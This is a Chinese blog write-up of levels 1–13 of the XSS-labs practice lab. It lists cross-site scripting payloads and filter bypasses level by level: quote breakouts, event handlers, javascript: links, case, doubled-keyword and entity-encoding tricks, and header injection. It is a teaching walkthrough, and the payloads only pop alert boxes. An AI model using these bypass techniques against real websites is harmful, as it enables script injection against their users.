XSS-labs(1-13关)

已于 2025-03-22 09:11:51 修改
阅读量1.1k 收藏 25
点赞数 20
文章标签: xss 前端
于 2025-03-19 19:03:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58456004/article/details/146356282
版权

目录

1.无过滤

2. 闭合双引号或标签

3.闭合单引号

4.闭合双引号

5.标签绕过

6.大小写绕过

7.双写绕过

8. HTML实体编码绕过

9.注释关键词绕过

10.覆盖type类型

11. Referer绕过

12.User Agent绕过

13.Cookie绕过

 

1.无过滤

直接过

2. 闭合双引号或标签

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">

htmlspecialchars() :将特殊字符转换为 HTML 实体

在<h2>中不能用标签,会被识别为普通字符

在表单的<input>中提交代码。

" οnclick="alert(1)

"> <script>alert(1)</script>// 

3.闭合单引号

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";

这里使用单引号闭合,且 htmlspecialchars()没有设置ENT_QUOTES属性,单引号不会被转义。

a' οnclick=alert(1)//

通过:

4.闭合双引号

" οnclick="alert(1)

" autofocus οnfοcus="alert(1)

5.<a>标签绕过

对输入转小写,并且禁止<script>标签和on事件

可以使用<a>标签的javascript伪协议,没有on事件

a"> <a href=javascript:alert(1)>aaa</a>

6.大小写绕过

过滤了很多关键字,但是相比第5关,没有转小写。

a"> <Script>alert(1)</Script>

7.双写绕过

过滤了关键字,但是是用替换为空过滤的,所以可以用双写绕过

a" oonnclick="alert(1)

a"> <sscriptcript>alert(1)</scscriptript>>

8. HTML实体编码绕过

过滤了很多关键字,注入点在<a>标签的href属性中,可以对javascript伪协议进行HTML实体编码,在进入浏览器后会自动解码。

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)

9.注释关键词绕过

乍一看不能再用javascript伪协议,因为链接里必须包含http://,但是这里只检测输入里是否包含http://,所以把http://放到字符串末尾,并注释即可。

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)//http://

10.覆盖type类型

可以看到t_sort是注入参数,但是<input>的type是hidden,隐藏了起来不能直接使用。

如果<input>元素中有两个type属性,浏览器会忽略第二个属性,只使用第一个属性的值

添加type="text"使<input>框显示

?keyword=well%20done!&t_sort=1"%20type="text" οnclick="javascript:alert(1)

11. Referer绕过

HTTP头部绕过

1" type=text οnclick="javascript:alert(1)

12.User Agent绕过

13.Cookie绕过

qq_58456004
关注
Matplotlib 安装教程
专注基础架构领域
11-17 6058
Matplotlib是一个Python的绘图,可以用来制作各种类型的图表和图形展示。它是Python数据可视化中最常用的工具之一,无论是数据分析还是图像处理,Matplotlib都是必不可少的。然而,对于初学者而言,Matplotlib安装却可能会成为一道难题。下面,本文将从多个角度分析,为小白提供最简单的Matplotlib安装教程。
PythonMatplotlib详解
pumpkin84514的博客
08-30 1793
Matplotlib作为Python中功能强大的数据可视化,其丰富的API和灵活的配置选项使得用户可以轻松地创建各种类型的图表。在掌握了基本的绘图流程后,用户可以尝试更多高级用法,如多子图布局、交互式图形生成等,以满足更复杂的需求。
Python安装matplotlib需要的文件
03-11
里面有针对64的Python2.7系列的matplotlib.exe文件,还有别的,很实用
Matplotlib (绘图)
最新发布
m53421的博客
04-04 1534
Matplotlib :是一款用于数据可视化的 Python 软件包,支持跨平台运行,它能够根据 NumPy ndarray 数组来绘制 2D 图像,它使用简单、代码清晰易懂Matplotlib 图形组成:安装pip install matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple/
5方法,用python安装matplotlib
热门推荐
m0_75067629的博客
09-13 2万+
在数据可视化的世界里,matplotlib 是一个非常重要的工具。它提供了一整套绘图功能,帮助我们将数据可视化为图表。无论你是数据科学家、工程师,还是只是在数据处理领域有所涉猎,掌握 matplotlib安装方法都能让你的工作更加高效。本文将详细介绍几种在Python安装 matplotlib方法
pythonMatplotlib安装教程
有趣的树人的博客
03-19 8108
超简单的Matplotlib安装教程(多图)
python安装matplotlib
Python老吕的博客
06-21 5044
无论你是在Windows、Linux还是Mac上,都可以通过pip包管理器来安装matplotlib安装过程中可能会遇到一些问题,但通常都可以通过更新pip、检查网络连接、使用正确的权限或安装缺失的依赖项来解决。安装完成后,你可以通过导入matplotlib并检查其版本来验证安装是否成功。
Python中的matplotlib安装教程:多种方法详解
陌然的博客
08-08 4617
在数据可视化的世界里,matplotlib 是一个非常重要的工具。它提供了一整套绘图功能,帮助我们将数据可视化为图表。无论你是数据科学家、工程师,还是只是在数据处理领域有所涉猎,掌握 matplotlib安装方法都能让你的工作更加高效。本文将详细介绍几种在Python安装 matplotlib方法方法一:使用pip安装pipPython包管理工具,使用它安装 matplotlib...
详解python安装matplotlib三种失败情况
01-19
(可能只有最后一句命令有用,可能全篇都没用) ...一开始我在pycharm终端使用pip install matplotlib时,出现的是下图所示情况,大致情况是安装时间太长,所以当时我用了清华镜像,将原来的命令改成了pip install -i ...
python3.12 环境(matplotlib
01-28
MatplotlibPython 数据可视化的核心,适用于创建高质量的静态、动态、交互式的图像。在Python 3.12中,Matplotlib 可以与 PyCharm 社区版这样的集成开发环境(IDE)无缝协作,提供强大的图形用户界面和调试...
Python配置matplotlib完整安装
04-27
64位下配置matplotlib模块完整安装包。
python怎么安装matplotlib
hakesashou的博客
05-15 1787
5、验证是否安装成功。打开windows命令行窗口,输入"python"进入python命令交互窗口,输入“import matplotlib"命令,如果不显示错误,说明安装成功。1、登陆官方网址“https://pypi.org/project/matplotlib/#description”,下载安装包。4、打开windows的命令行窗口,通过"pip install"这个命令安装matplotlib文件。3、将安装包放置到python交互命令窗口的当前目录下。2、选择合适的安装包,下载下来。
Python-Matplotlib安装及简单使用
riyuexingchen0909的专栏
06-19 484
在使用NumPy进行学习统计计算时是枯燥的,大量的数据令我们很头疼,所以我们需要把它图形化显示。  Matplotlib是一个Python的图形框架,类似于MATLAB和R语言Matplotlib的官网地址是 http://matplotlib.org/ ,下载地址为 http://matplotlib.org/downloads.html,选择对应的版本即可安装,我选择的版本为 ma
Python matplotlib
Yuanshigou9的博客
02-28 1941
Python_matplotlib:绘制折线图、绘制散点图、绘制随机漫步
pythonmatplotlib安装
qq_44931127的博客
06-03 7086
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Python安装Matplotlib
qq_45765047的博客
08-22 1186
PYTHON安装Matplotlib 参考书籍:《Python编程,从入门到实践》 1.先安装pip模块:进入网站,点击download files [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9u1d52wV-1629619804179)(https://pypi.org/project/pip/#description#pic_center)] 2.点击第二个下载 3.使用cmd命令安装一下 4.pip安装成功 5.安装Matplotlib 执行命令 pytho
python 安装matplotlib 模块
hegongxu的博客
10-11 1178
安装Matplotlib,下载地址(http://www.lfd.uci.edu/~gohlke/pythonlibs/#pyparsing) 仿照安装numpy模块 pip3.5 install matplotlib-2.1.0-cp35-cp35m-win_amd64.whl
python安装matplotlib绘图
振华OPPO的博客世界
01-13 8039
MatplotlibPython 的绘图,它能让使用者很轻松地将数据图形化,并且提供多样化的输出格式。Matplotlib可以用来绘制各种静态,动态,交互式的图表。 Matplotlib 是一个非常强大的 Python 画图工具,我们可以使用该工具将很多数据通过图表的形式更直观的呈现出来。 Matplotlib 可以绘制线图、散点图、等高线图、条形图、柱状图、3D 图形、甚至是图形动画等等。
python安装matplotlib方法
04-11
安装matplotlib方法是在命令行或终端中使用pip命令进行安装,在安装前需要确保已经正确安装Python环境,并且已经配置好了pip。具体方法是在终端中输入“pip install matplotlib”,等待安装完成即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值